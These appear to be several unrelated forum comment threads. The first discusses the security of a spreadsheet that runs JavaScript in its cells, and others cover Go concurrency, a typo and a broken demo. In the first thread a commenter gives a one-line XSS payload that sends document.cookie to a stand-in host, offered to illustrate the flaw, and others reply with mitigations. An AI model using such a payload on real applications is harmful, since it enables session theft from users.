The fact that you can put Javascript code which interacts with the cells is awesome.

For example you can put 10 in A1 and then put "=sum=0;for(i=0;i<A1;i++)sum+=i" in A2 to get the sum from 0 to 10. I really like this.

You may like, but it is an obvious security flaw. A 'real' product couldn't have this feature, at least not the way it is implemented here.

Please elaborate. ( i ask because i am writing a spreadsheet where every cell can be JSON or a JS expression )

What sort of vulnerabilities does this expose, besides letting the user shoot their feet repeatedly? Cross site scripting?

document.write('<img src="somedomain.com/?'+document.cookie);

But you'd need to send a spreadsheet with that to the victim.

Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.

have you heard of the HttpOnly attribute for cookies?

good, send HttpOnly cookies and solve that problem. window.location.href='http://www.redt*be.com'; -- if you think evaluating JS code, as-is passed by the client is a good idea go ahead.

I most definitely will. and if my users want to browse your favorite porn site i don't see why i shouldn't let them..

Put it in a sandboxed iframe, serve it from a separate domain, and use a very restrictive CSP?

Yeah! Better replace it with VB and you've got no security probl... oh wait!

Hey, poster here.

You're right that sync/atomic could've taken care of this, I wasn't aware of that package and figured channels were the way to go in Go.

As for making the waiting chan buffered, the reason I wanted to keep track of pending connections and active connections is because I'd like to proxy from a high-power server to a low-power server such as a Raspberry Pi. I agree with you that it could have done without though.

Thanks for the tips! :-)

So perhaps I was a bit harsh. Do check out this set of slides though: http://talks.golang.org/2012/concurrency.slide

One of the last slides: http://talks.golang.org/2012/concurrency.slide#54

Thanks, that's an awesome resource!

Looks great! Just a small typo: "You can also you <em> to italicize your words."

Thanks! Fixed it.

The demo doesn't seem to work on Chrome 25.0.1364.152 m. I'm getting this error whenever I try any of the shortcuts (or when I select a command from the drop down):

Uncaught TypeError: Cannot set property 'curOrigin' of undefined (infer.js:489)

Looks interesting though!

That was another quick update that broke things. I fixed it ~20 minutes after I pushed it, but I guess you exactly hit the window where it was broken.

Just to let you know, Dawson wrote a response to the media which can be seen at http://www.dawsoncollege.qc.ca/